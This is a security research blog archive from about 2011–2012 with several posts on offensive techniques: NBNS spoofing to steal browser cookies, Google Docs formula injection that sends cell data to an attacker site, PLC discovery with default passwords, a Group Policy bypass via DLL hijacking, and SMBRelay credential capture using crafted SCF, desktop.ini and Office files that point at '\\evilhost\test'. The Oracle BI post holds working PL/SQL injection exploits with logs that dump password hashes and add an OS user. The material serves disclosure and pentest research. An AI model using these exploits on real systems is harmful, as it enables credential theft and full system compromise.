Digital Security Research Group

NetBIOS spoofing for attacks on browser

2012-01-25T06:02:00.000-08:00

Sometime ago during pentest NetBIOS protocol got my attention. Especially, NetBIOS naming and its co-work with DNS.
NetBIOS is an old protocol, distributed world-wide, but it doesn’t have many security mechanisms. And I think that many interesting things are born in different technologies’ interception. So I started a little research and I want to show some results of it.

NetBIOS Intro
First of all, there is some common information about NetBIOS.
From wiki:
“NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network As strictly an API, NetBIOS is not a networking protocol.”
NetBIOS protocol provides some services, including Name Service. It is responsible for resolving of NetBIOS names to IP-address. Name Service operates on UDP port 137. So it’s analogue to DNS.
NetBIOS Name can include any alphanumeric characters except:

\ / : * ? " ; | + space

Max Name length is 15 characters.
Name resolution can be done either by a special WINS server (NetBIOS Name Server) or a broadcast request. But the second method is often used.
A NetBIOS request has «Transaction ID» field with a unique identifier. So, when somebody tries to resolve NetBIOS name, Windows sends a broadcast request and we can catch it and send a reply with any IP-address. It is a NetBIOS Name Service-spoofing (NBNS) attack – a classic Man-in-the-middle attack.
In addition, NetBIOS is enabled by default in all Windows systems.

Old Tricks
When I got into the NetBIOS-protocol, I’ve got an idea to create a Metasploit module to perform NBNS-spoofing, but Tim Medin passes ahead of me :) Almost a year ago, he created that module (auxiliary/spoof/nbns/nbns_response). In addition, he wrote a great post about using of NBNS-spoofing for NTLM-relay attack. A bit later I’ll add his trick to SMBRelay Bible, if he accepts it :)
Then I tried to improve his ideas…

Tim wrote two interesting details.
The first is a sequence of resolution IP-addresses in Windows OS:
1) local hosts file - C:\Windows\System32\drivers\etc\hosts
2) DNS
3) NetBIOS Name Service

Secondly, all modern browsers have “intelligent address bar”. This bar is used as address bar and as a search bar at the same time. When a user enters a word in it, a browser tries to access a host with such name and only then it tries to search this word.
For example, if I enter “dsecrg” in address bar of my browser, it tries to get IP-address of “dsecrg” by DNS, then by NetBIOS Name Service and after all “dsecrg” is gone to default search engine.

Therefore, we can use a NBNS-spoofing attack and send reply with our IP-address to user’s browser, when it tries to resolve “dsecrg” by NBNS. Then user’s browser connects to our web-server.

New Tricks
But let’s go forward. As we can see, if Windows can’t perform IP-resolution via DNS, it tries NBNS.
And what will be if we try to connect to aaa.google.com?

There is analogue situation. DNS is the first, NBNS is the second… And we can spoof Internet addresses! So, there we have that NBNS-spoofing is analogue to DNS-spoofing.

Is NBNS-spoofing attack better than DNS-spoofing?
No, it is not. Because NBNS-spoofing attack has some rough limitations:
1) It works only in local networks
2) It has hostname length limitation (15 characters)
3) It can spoof only hostnames which DNS can’t resolve. But we can bypass this limitation, if we can make DoS attack on DNS server.

By the way, NBNS-spoofing attack can be very useful in some situations. The main plus of this attack is that it doesn’t send any illegal traffic. DNS-spoofing or arp-poisoning are “aggressive” attacks and perform much “bad” traffic. So, it’s harder to detect NBNS-spoofing attack by IPS/IDS systems. In addition, it can be useful when DNSSEC is used in a network.

Ok, but what can we gain with NBNS-spoofing’s limitations?
Yes, we can spoof only hostname which it can’t find via DNS (without DoS of DNS server), but we can spoof subdomains! And it is enough for us.
There is a list, what we can do, if we can spoof subdomain of attacking domain and “redirect” user to our web-server.

1) Stole session cookie
Cookies can be set to all subdomains of a domain (domain=.foo.com;). So if we spoof a subdomain of a domain, browser sends us a victim’s session cookies.
Therefore, if a cookie is set without a domain-field (such situation is very often), Internet Explorer sets them to a domain and all its subdomains. But, by RFC, IE should set it only to current domain. (Researched by @D0znpp)
As we can see, we can steal cookies very often.

2) Session Fixation
Same Origin Policies set an interesting exception to cross domain interaction rules. Subdomain can set (and rewrite) a cookie of domain. For example, aaa.google.com can set cookie to google.com, but couldn’t set to bbb.google.com or zzz.aaa.google.com.
We can use it.
If a web-application of a server has session fixation vulnerability, we can spoof subdomain of this server and set cookie to it.

*A strange moment. During test I was trying to set cookie to “localhost” from subdomain of localhost, but I couldn’t do it.

3) Cross domain policies bypass.
It is a frequent situation, when * is used for domain in crossdomain.xml.
For example, adobe.com:
<allow-access-from domain="*.adobe.com">
We can spoof subdomain (aaa.adobe.com) and get full session riding via Flash.

4) Phishing
Classic phishing attacks…

Catch a user
In all these attack vectors, we have a little problem. How to enforce user to come to our (fake) subdomain? For resolving the problem, we can use a NBNS-spoofing attack :)
Example of cookie stealing for example.com:
1) Run NBNS-spoofing against all domains
2) Run our web-server with a little script, which should:
- Collect incoming cookies (sorted by Host http-request field)
- Reply a simple html page with hidden iframe with “src=aaa.example.com”
3) When user inserts into browser any inexistent domain name, our NBNS-spoofing attack will work and his browser will come to our web-server. Then the browser will try to open aaa.example.com, NBNS-spoofing attack will work again and we’ll get cookies from example.com.

Outro
NBNS-spoofing attack is an interesting stuff and it’s not looking too hard to realize such attacks in real life.

I’ll be glad if my research will be interesting and useful for anyone :)
By the way, I would like to thank @D0znpp for his help!

And thank you, for your attention.
Alexey Tyurin

Excel formula injection in Google Docs

2011-12-21T02:20:00.000-08:00

Surely all of you know about Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov.

One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey.
There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms.

After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey.
This is how the form looks for a participant:

And this is how the author sees the participant's answers:

I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here?
We tried it, too. However, everything was encoded and filtered exactly as planned.
Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula?
Excel formulas start with an “=”.
OK, let’s give it a try.

Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell.
So how do we get rid of the space? Easy as pie: use backspace :)
%08 is the Hex code of the backspace key.

Thus, we wrote in the entry field:
%08=1+2+C3

Voila!

The formula got inserted into the table just fine.
All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here.

With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell.

That gave us the following attack vector:
1) Put sensitive user data into A1 cell (or probably they are already there)
2) Put a formula which makes GET request to http://own_site.com/secret_data_in_base64 into Z666 cell.
3) Read web server logs, get data from cells.
4) Profit!

Soon after describing the bug and the possible attack vector we got the following letter:

And a bit later we saw our names in Google Hall of Fame

Finally, a little Google Hack ;)

Hacking PLC from the internet part1.1 (Edited)

2011-11-22T08:22:00.000-08:00

So many of you guys probably know that SCADA systems can be found in the internet. It is not so hard. You just need to know google or shodanhq search strings.

But what is more important is that PLC devices that must be much more secured from the outside than SCADA are also available from the internet!

Let me show you one example of one of the most popular PLC device from WAGO.
It can be easily founded using the inurl:/plc/webvisu.htm

Just a little add-on. You can also use ShodanHq with search string "/plc/webvisu.htm"
and fing 90 more systems.

And you can find real examples of remotely operated PLC devices like a smart house for example. And of cause there are some default passwords like admin:wago

More Epic SCADA and PLC pwnage examples and 0-days on real devices will be presented at zeronighs.org conference by DSecRG (ERPScan Research) in November 25.

Mass disclose of vulnerabilities in SAP from DSECRG (ERPScan research center)

2011-11-21T12:16:00.000-08:00

This month ERPScan specialists published 8 vulnerabilities of different criticality, found in SAP products.

Vulnerabilities representing almost all risks from the OWASP Top 10: from path traversal and XSS to authorization bypass and code injection - were published on ERPScan.com site.

Every month we publish information about vulnerabilities founded in SAP products by our specialists, but this was a really productive month. We have to say that SAP increased the rate of reaction against vulnerabilities found by third-party researchers. Right now they much faster find solutions for these vulnerabilities, it makes the system more secure.

However there is still a huge problem connected with administrators’ ignorance and the complexity of installing updates. That’s why according to our surveys a huge amount of SAP systems, including those available via internet, contains vulnerabilities, which are already closed by SAP. These companies can be very easy targets for attackers,

Universal way to bypass Group Policy by Limited User.

2011-07-22T06:16:00.000-07:00

What is it?
Group policy is a powerful feature of Windows OS.

From wiki: “Group Policy is a set of rules which control the working environment of user accounts and computer accounts. Group Policy provides the centralized management and configuration of operating systems, applications and users' settings in an Active Directory environment“

For example, it can block users’ access to Regedit or IE proxy changing. So it is additional limits for users, besides file system and other permissions.
One of the main parts of Group Policy is represented by Software Restriction Policy (SRP). Administrator can set a little list of software which can be run by limited user with SRP.
Therefore, SRP can level up security of whole system by restricting user’s rights.

How does it work?
When a user launches a process it’s the parent process that checks SRP to see if the execution of the child should be allowed or blocked. The parent process uses NtQueryValueKey to query the Registry value HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled, which if present and non-zero indicates that SRP is turned on.

How can we bypass it?
There are few different.
Their main idea is that SRP check is situated in user space. A parent process is owned by a limited user. Therefore, a user can bypass SRP by different memory manipulations.

Attack!
Marc Russinovich posted a great tool – Gpdisable and a good explanation of SRP on his blog. Gpdisable is now unavailable, but it can be found in Internet
Gpdisable uses dll-injection techniques, to inject into a parent process memory. Then “it fools the SRP code by returning an error value”, when SRP tries to query TransparentEnabled. Therefore, a parent process can run any other process.

Problem.
Gpdisable consists of 2 files – gpdisable.exe and gpdisable.dll.
gpdisable.exe – inject DLL into process.
gpdisable.dll – DLL for bypassing SRP.
But in real life, there is a problem - to inject gpdisable.dll. Because in a good restricted system a user has access to run only software from white list. So you should run gpdisable.exe, but you don’t have right to do it.

Real Attack!
When I read about binary planting, I’ve got an idea how we can inject gpdisable.dll in process. It’s simple – dll-hijacking. But almost all big software (like MS Word, Excel and Notepad :) doesn’t have such vulnerabilities. That’s bad.
But if we use "advanced" dll-hijacking (COM server-based binary planting), we can do it almost of all software. I won’t retell an idea of such binary planting, but you can get it from Acros Security Blog.

Steps to bypass SRP for XP:
1. rename gpdisable.dll to deskpan.dll;
2. create a new folder and name it as files.{42071714-76d4-11d1-8b24-00a0c9068ff3};
3. place deskpan.dll to the new folder;
4. open the folder;
5. create a new rich text document in the folder;
6. double-click the rich-text document.
7. Wordpad runs with gpdisable.dll
8. Bypassed :) We can run any process.

There are similar steps for Windows Vista/7 and others.
In addition, all that steps we can do from “Open” or “Save As” dialogue, that can be useful for Citrix systems.

Thanks to Ryan Sears.

And thank you, for your attention.
Alexey Tyurin

Hacking Oracle Business Intelligence

2011-06-16T06:01:00.000-07:00

Here I will show some vulnerabilities founded in Oracle BI and hoe they can be founded and how a different exploits can be written. It will be based on vulnerabilities that was patched in April CPU 2011 by Oracle. Interesting moment that founded PL/SQL vulnerabilities founded in programs that executed by privileged user but not a DBA directly so it is more interesting to find out a way to get access to whole system using those rights.

1.PL/SQL Injection in OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID

Procedure OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID executes with rights of user OWBREPOS_OWNER and granted to PUBLIC user. So exploiting vulnerability in this procedure can give any user OWBREPOS_OWNER rights. OWBREPOS_OWNER has a number of critical Roles and privileges so executing vulnerabilities in OWBREPOS_OWNER can give attacker access to all database objects and even give him rights to execute OS commands.

Details
*******

PL/SQL Injection found in procedure OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID
Vulnerable parameters are:

Argument Name Type In/Out Defaul
------------------------------ ----------------------- ------ ------
P_CUBE_NAME VARCHAR2 IN
P_MEASURE_NAME VARCHAR2 IN
P_SOLVE_GROUP_ID VARCHAR2 IN

Argument P_CUBE_NAME is not sanitized so attacker can inject any sql code that can be executed in OWBREPOS_OWNER rights. OWBREPOS_OWNER is not DBA but he has a number of critical ROLES and PRIVILEGES that can be used see all data in database tables including user hashes and can be used for access to OS files execute OS commands and get a SYSDBA rights.

Critical roles and privileges are:
1. SELECT ANY DICTIONARY
2. JAVA_ADMIN
3. CREATE EXTERNAL JOB
4. CREATE ANY DIRECTORY
1.1 OWBREPOS_OWNER have privilege "SELECT ANY DICTIONARY"

So he can get to access password hashes and any other data in database.

example EXPLOIT:
****************

CREATE TABLE SH2KERR(id NUMBER, name VARCHAR(20),password VARCHAR(16));
CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';
COMMIT;
RETURN 'Z';
END;
/
grant execute on SHOWPASS to PUBLIC;
grant insert on sh2kerr to PUBLIC;
exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SHOWPASS()||''aaa','bbb','bbb');
select * from sh2kerr;

DISASSEMBLY (here we can see a query where our code in injected)
***********

SQL> select sql_text from v$sql where sql_text like '%aaa%';

SQL_TEXT
--------------------------------------------------------------------------------

INSERT INTO OWB$$$_SOLVE_GROUP_IDS(CUBE_NAME, MEASURE_NAME, SOLVE_GROUP_ID) VALU

ES('aaa'||SCOTT.SHOWPASS()||'aaa', 'bbb', 'ccc')

select sql_text from v$sql where sql_text like '%aaa%'
BEGIN OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SHOWPASS()||''aaa','b

bb','ccc'); END;

SQL>

EXPLOITING LOG
**********
C:\Documents and Settings\Alexandr.Polyakov>sqlplus scott/tiger@172.16.1.1/bi
se1db
SQL*Plus: Release 10.1.0.2.0 - Production on Tue Feb 17 19:59:18 2009
Copyright (c) 1982, 2004, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Release 10.2.0.1.0 - Production

SQL> CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));
Table created.
SQL>
SQL> CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
2 authid current_user as
3 pragma autonomous_transaction;
4 BEGIN
5 EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_
id,username,password FROM DBA_USERS';
6 COMMIT;
7 RETURN 'Z';
8 END;
9 /

Function created.

SQL> grant execute on SHOWPASS to PUBLIC;

Grant succeeded.

SQL> grant insert on sh2kerr to PUBLIC;
Grant succeeded.
SQL> exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SHOWPASS()||''aaa','bbb','bbb');
PL/SQL procedure successfully completed.
SQL> select * from sh2kerr;

ID NAME PASSWORD
---------- -------------------- ----------------
87 MGMT_VIEW 7341A347*******
0 SYS 77E6B621*******
5 SYSTEM 00F69E7C*******
24 DBSNMP 2799F7BE*******
85 SYSMAN B74FA5204*******
79 OWBREPOS_USER 77B72F569*******
54 SCOTT F894844C3*******
63 BISE1_TUTORIALWH D41A12EB3*******

1.2. OWBREPOS_OWNER have role "JAVA_ADMIN"

So he can execute any OS level commands with privileges of owner of Oracle BI process (In windows by default it is LOCAL SYSTEM user) using for example this exploit:

EXPLOIT
*******

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2
authid current_user as
pragma autonomous_transaction;
SqlCommand VARCHAR2(2048);

BEGIN
SqlCommand := '
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
import java.lang.*;
import java.io.*;

public class ExecuteOS
{
public static void printFile (String fileName) throws IOException
{
File fileOut;
FileReader fileReaderOut;
BufferedReader buffReader;
String strRead;

fileOut = new File (fileName);
fileReaderOut = new FileReader (fileOut);
buffReader = new BufferedReader(fileReaderOut);
while ((strRead = buffReader.readLine()) != null)
System.out.println(strRead);
}

public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException
{
String[] strCmd = {"cmd.exe", "/c", "1>c:\\stdout.txt", "2>c:\\stderr.txt", cmd};

System.out.println("==========\r\nExecuting OS command...");
Process p = Runtime.getRuntime().exec(strCmd);
p.waitFor();
System.out.println("\r\n==========\r\nThis was the STANDARD OUTPUT for the command:");
printFile ("c:\\stdout.txt");
System.out.println("\r\n==========\r\nThis was the ERROR OUTPUT for the command:");
printFile ("c:\\stderr.txt");
}
}';
execute immediate SqlCommand;

SqlCommand := '
CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
AS LANGUAGE JAVA
NAME ''ExecuteOS.execOSCmd (java.lang.String)'';';
execute immediate SqlCommand;

execute immediate 'GRANT EXECUTE ON PROC_EXECUTEOS TO SCOTT';

commit; -- Must do a commit
return ''; -- Must return a value
END;
/

grant execute on SCOTT.SQLI to PUBLIC;
/

SET SERVEROUTPUT ON
/
exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SQLI()||''aaa','bbb','bbb');
/
CALL dbms_java.set_output(1999);
/
EXEC OWBREPOS_OWNER.proc_executeos ('set');
/

EXPLOITING LOG
**************
C:\Documents and Settings\Alexandr.Polyakov>sqlplus scott/tiger@172.16.1.1/bi
se1db

SQL*Plus: Release 10.1.0.2.0 - Production on Thu Mar 5 11:57:29 2009

Copyright (c) 1982, 2004, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Release 10.2.0.1.0 - Production

SQL> CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2
2 authid current_user as
3 pragma autonomous_transaction;
4 SqlCommand VARCHAR2(2048);
5
6 BEGIN
7 SqlCommand := '
8 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS
9 import java.lang.*;
10 import java.io.*;
11
12 public class ExecuteOS
13 {
14 public static void printFile (String fileName) throws IOException
15 {
16 File fileOut;
17 FileReader fileReaderOut;
18 BufferedReader buffReader;
19 String strRead;
20
21 fileOut = new File (fileName);
22 fileReaderOut = new FileReader (fileOut);
23 buffReader = new BufferedReader(fileReaderOut);
24 while ((strRead = buffReader.readLine()) != null)
25 System.out.println(strRead);
26 }
27
28 public static void execOSCmd (String cmd) throws IOException, java.lang.I
nterruptedException
29 {
30 String[] strCmd = {"cmd.exe", "/c", "1>c:\\stdout.txt", "2>c:\\stderr.t
xt", cmd};
31
32 System.out.println("==========\r\nExecuting OS command...");
33 Process p = Runtime.getRuntime().exec(strCmd);
34 p.waitFor();
35 System.out.println("\r\n==========\r\nThis was the STANDARD OUTPUT for
the command:");
36 printFile ("c:\\stdout.txt");
37 System.out.println("\r\n==========\r\nThis was the ERROR OUTPUT for the
command:");
38 printFile ("c:\\stderr.txt");
39 }
40 }';
41 execute immediate SqlCommand;
42
43 SqlCommand := '
44 CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)
45 AS LANGUAGE JAVA
46 NAME ''ExecuteOS.execOSCmd (java.lang.String)'';';
47 execute immediate SqlCommand;
48
49 execute immediate 'GRANT EXECUTE ON PROC_EXECUTEOS TO SCOTT';
50
51 commit; -- Must do a commit
52 return ''; -- Must return a value
53 END;
54 /

Function created.

SQL> grant execute on SCOTT.SQLI to PUBLIC
2 ;

Grant succeeded.

SQL> exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SQLI()||''aaa','b
bb','bbb');

PL/SQL procedure successfully completed.
SQL> SET SERVEROUTPUT ON
SQL> CALL dbms_java.set_output(1999);

Call completed.

SQL> EXEC OWBREPOS_OWNER.proc_executeos('set');

PL/SQL procedure successfully completed.

SQL> EXEC OWBREPOS_OWNER.proc_executeos('set');
==========
Executing OS command...
==========
This was the STANDARD OUTPUT for the command:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
ClusterLog=C:\WINDOWS\Cluster\cluster.log
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=PINKERTON
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
ORACLE_SID=bise1db
OS=Windows_NT
Path=D:\oracle\bise1\bi\server\Bin;D:\oracle\bise1\bi\web\bin;D:\oracle\bise1\bi

\web\catalogmanager;D:\oracle\bise1\bi\SQLAnywhere;D:\oracle\bise1\jdk\bin;D:\or

acle\bise1\db\bin;D:\oracle\bise1\owb\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WIND

OWS\System32\Wb
em
.
.
PL/SQL procedure successfully completed.

SQL> EXEC OWBREPOS_OWNER.proc_executeos('net user hax hax /add');
==========
Executing OS command...
==========
This was the STANDARD OUTPUT for the command:
==========
This was the ERROR OUTPUT for the command:

PL/SQL procedure successfully completed.

-------------------------------------------------------------------------------------------

1.3. OWBREPOS_OWNER have privelege "CREATE EXTERNAL JOB"

So he can execute any OS level command like in this exploit for example (http://milw0rm.com/exploits/7677)

1.4. OWBREPOS_OWNER have privilege "CREATE ANY DIRECTORY"
So he can get the SYSDBA privileges or execute OS level command using for example this method
http://www.oracleforensics.com/wordpress/wp-content/uploads/2008/10/create_any_directory_to_sysdba.pdf

Conclusion

So you see that even if you have pl/sql injection not only on SYS or SYSTEM package it is also possible to exploit system and even get access to Operation System and to ALL business data. By the way Oracle BI is using in many big companies to store Business data so it is a nice target for attack)
You can also try to repeat these steps at home by trying to exploit similar vulnerabilities in:
1) WB_RT_AUDIT_SHADOW_TABLE
2) OWBREPOS_OWNER.WB_OLAP_AW_REMOVE_SOLVE_ID

by sh2kerr

SMBRelay Bible 6: SMBRelay attacks on corporate users part 2

2011-04-25T06:08:00.000-07:00

Let’s continue our talk about variants of client-side attacks.

MS Office’s documents.
As it was written in last blog post, we can create crafted Office’s document and send it to users (via e-mail for example). When a user opens it, an office program tries to connect our server and give us user’s credential.

Such situation is available because:
1)Almost all MS Office programs have capability to read “html”-file or “mht”-file*.
2)MS Office’s documents can be saved as “html”-file or “mht”-file* without loss of document’s formatting.
3)MS Office programs detect how to parse and process a document by it’s content, not by file extension.

*“mht”-file - MHTML, short for MIME HTML, is a web page archive format.

Thereby, we should do next sequence for creating crafted MS Office’s document.
We save any office document as “html”-file or “mht”-file. The second is better because there will be created only one file which contains all parts of the documents.
Then we change (or create) “HREF” attribute of “LINK rel=stylesheet” element from default value to a link to our server. Then we rename the file to a normal office document extension (doc for example). A crafted document is ready. The method is very simple as we can see.

Example of code:

<link rel=stylesheet href=”\\evilhost\test”>

I want to mark out next interesting features.
Office programs understand “HREF” attribute both with a UNC path (\\evilhost\test) and with a HTTP path (http://evilhost/test). So we can catch user’s credentials via HTTP with NTLM.
MS Office programs show an attention to our victim if it couldn’t download content from a remote resource. This isn’t good. So we should put a document which we created for a victim on our shared resource. And when MS Office program opens a crafted document, it takes style sheet from our shared resource and doesn’t show an attention to a victim.

Windows Explorer and shared resources
In addition to the last blog post, we have found some specified files, which can give us necessary UNC-request from a user without attention to him.

- Autorun.inf
All of us know about “autorun.inf” and problems which it gives to common users via many kinds of viruses. Thereby, there are interesting things: autorun.inf can cause UNC-request by Explorer and it works with a Mapped Network Drives. But a last patch for Windows OS disables the Autorun functionality.

- .SCF file - Explorer Shell Command File.
This is a special file type, which contains commands for Windows Explorer. The example of such file is “ToggleDesktop” button. But information about all commands and all capabilities of the file type is not available. But this file extension “is one of the special ones that remains hidden even if you instruct Windows to show file extensions”.

For our purpose we can create or use any file, add next code to it and add “.SCF” to file extension. An original file extension will be shown to a user, but Explorer will see .scf and perform all the commands in that are in this file. Explorer gives user’s credential when user looks at folder with such .scf file.

[shell]
Command=2
IconFile=\\evilhost\test
[TaskBar]
Command=Explorer

Thanks for your attention.
Alexey Tyurin.

SMBRelay Bible 5: SMBRelay attacks on corporate users

2011-04-05T04:52:00.000-07:00

Client-side.
Today we will talk about client-side attacks.
An attack of a network is a progressive action. Usually, we escalate our rights step-by-step from nothing to a domain administrator. Even casual un-privileged users can give us something interesting, for example access to some shared resources.But how can we get these user rights?
We can enforce users to authenticate on controlled machine.
There are alt least three main ways to interact with user. They are very abstractive.

1)HTML and browser
We can use a social engineering or a MitM attack like dns-poisoning to bring users to our web site with a following code:

<img src=”\\evilhost\test”>

Their browsers will try to take the image from our server and give us their credentials. At the same time users will not know about such actions.

2) Crafted document
We can create special document (like MS Excel file) and send it to users via e-mail or put it on shared resources.When a user opens it, office program tries to connect our server and give us user’s credential. We will talk about it in the next blog post.

3) Windows Explorer and shared resources
If we have permission to write to some shared resources (for example file server or or directory on terminal server), we can create a specified file. When somebody browses to a folder with the file, Explorer will try to connect to our server without any interaction from a user.
Such “specified file” can be:

- .LNK - Windows Shortcut File.
There is ability for setting an icon to file. We can set path of it to our server and Explorer will try to download it.

- .URL - Internet Location File.
Like LNK-file - setting an icon to a file, but URL is a primitive text file. So we write a following text and save it with URL extension:
[InternetShortcut]
URL=http://dsecrg.com/
IconIndex=3
IconFile=//evilhost/test

- desktop.ini.
The file is used for folder’s customization. There is some different fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us necessary links to our server. Fields’ influences on Explorer are different (you can read about it here http://www.tarasco.org/security/payload/index.html).
A little limitation is a folder with desktop.ini, which should be ‘system’. It can be set by ‘attrib +s folder_name’. But there are some pluses: desktop.ini are ‘hidden’ by default, and folders like “My Documets”, “Disc C(D, E,..)”, “Desktop” are ‘system’ by default.
Simple example of desktop.ini:
[.ShellClassInfo]
IconFile=//evilhost/test

SMBRelay Bible 4: SMBrelay with no action or attacking security software ( Kaspersky AV,Symantec DLP, GFI Languard 0-days)

2011-03-14T07:14:00.000-07:00

Inro

When we talk about SMB Relay attacks we describe some actions from attacker which make Incoming NTLM authentication process from server "A" possible and then relay it to server "B". Finally attacker becomes successfully authenticated to server "B" by using account from server "A". We have already described this type of actions, that initialized authentication process from server "A” by using ERP functions or RDBMS stored procedures. There are many ways for server "A" to make SMB connection to attacker.

SMBrelay with no action

In this post I would talk about situations where attacker may do nothing. In these cases server "A" makes connection by SMB by itself without attacker's manipulations. How it can be? Very simply. In big corporate networks there can be some server with some software that does automated scan of subnet for some purpose. This scan uses SMB protocol and, of course, NTLM authentication. If attacker’s host will be in the same subnet he can make Relay. Attacker needs just to wait.

Attack!!!

Which system is affected? It can be any client-server systems. It can be DLP server that works with agents on workstations via SMB, it can be Antivirus, which tries to deploy remote agent, and do other things. Here are some real examples that can prove this theory.

1. GFI LanGuard

It is very useful tool for Security Administrators. This software has a function - to grab all info from target by using Domain account, and also it has a schedule. If an administrator has to install it on some server "A" and configure it for scanning subnet by schedule (one scan in a week) with account that has local or (worse) domain admin rights, so here is a hole. Malicious user can install fake smb server on his PC and relay this credentials to have a full access to network.

2. Kaspersky AV

Famous antivirus software has dangerous function "Scan IP subnets" that is enabled by default in Kaspersky Administration Kit (6/8). This function makes ICMP scan and also tries to use SMB protocol by using service account which can be used to run SMBrelay attack and gain full control on secured network. When we talk about Kaspersky Administration Kit 6, we must know that it is difficult for administrator to give right privileges to service account that needed by AV. By reading documentation you finally make decision that this account needs to be in Local Administrators group. By default "Scan IP subnets" scans your subnet every 7 hours. Attacker just needs to wait. As AV agent is everywhere, and server’s account has local administrator right, it is very dangerous for company but very useful for penetration testing. We have done some internal penetration-tests just by using only this 0-day vulnerability.

Update by 16 march (Just found on current pentest)

3. Symantec DLP

Symantec DLP is also vulnerable to this attack when it tries to search critical data on workstations but exploitability depends on user rights.

P.S. Kaspersky vulnerability team has answered after bug report - http://support.kaspersky.com/faq/?qid=208284121

Good Luck!
Alexey Sintsov
Digital Security Research Group

SMBRelay bible - 3. SMBRelay by Oracle

2011-03-09T06:49:00.000-08:00

Like in the previous blog post, we’ll talk about methods which need only non-privileged rights. Because we have too many ways for SMB Relay for privileged accounts, much depends from current situation and our rights.

Inro
Our next target is Oracle. Oracle is one of the most widespread RDBMS and many Enterprises use it as backend. We can find version from 8i to 11g in real life. Next information will be actually for each of them.

Runs as…
Oracle server service runs as ‘System’ by default. But like MS SQL, it is very often occurs that the service runs as a domain/local user account by different reasons, for example when it is used as backend for SAP and other ERP systems.

Attack!!!
There are two ways for SMB relay attack realization. One of them doesn’t need any privilege, another one needs CONNECT and RESOURCE privileges which can be found in any user.

1st method – TNS listener set_log.

“The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system.”

We can use this method when we have ability for remote connection to TNS listener.
Before 10g TNS listener is not defended by password or ‘ADMIN_RESTRICTIONS’ option by default. We should use ‘set_log’ command for SMB relay.
The command ‘set_log’ sets a way to TNS listener’s log file.
We can use either an original Oracle tool – ‘lsnrctl’ or a Perl script – ‘tnscmd’ to exploit this vulnerability.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL>set log_file \\evilhost\test

Next connection to TNS-listener gives you necessary UNC-request for SMBrelay.

2nd method – ctxsys.context.
This method needs only ‘CONNECT’ and ‘RESOURCE’ roles for an attack which almost all users have. So you need to have at least one real user in RDBMS. We use creation of indexes by ctxsys.context to force UNC path request to our host.

There are three steps:
1) Create a special table:

SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));

2) Insert the network path into the new table:

SQL> INSERT INTO files VALUES (1, "\\evilhost\test", NULL);

3) Create ctxsys.context index on path column:

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context PARAMETERS ("datastore ctxsys.file_datastore format column ot_format");

And we successfully have SMBrelay.

Full description of this method you can see here: "Penetration from application down to OS (Oracle database)".

Here is the table showing which method can be used in different versions.

Table 1

Method	8i	9i	10g	11g	User needs
set log file	OK	OK	NO	NO	NO
ctxsys.context	OK	OK	OK	OK	YES

SMBRelay bible - 2. SMBRelay by MS SQL server

2011-02-28T06:37:00.000-08:00

Intro
Today we will talk about practical using of SMBRelay attack through one of the famous software which very often becomes a part of ERP systems. This is MS SQL server. The last version is 2008 (R2), but we can see 2005 and 2000 in real life too, because they take up big part of RDBMS application area. We will touch all of them.

Run as…
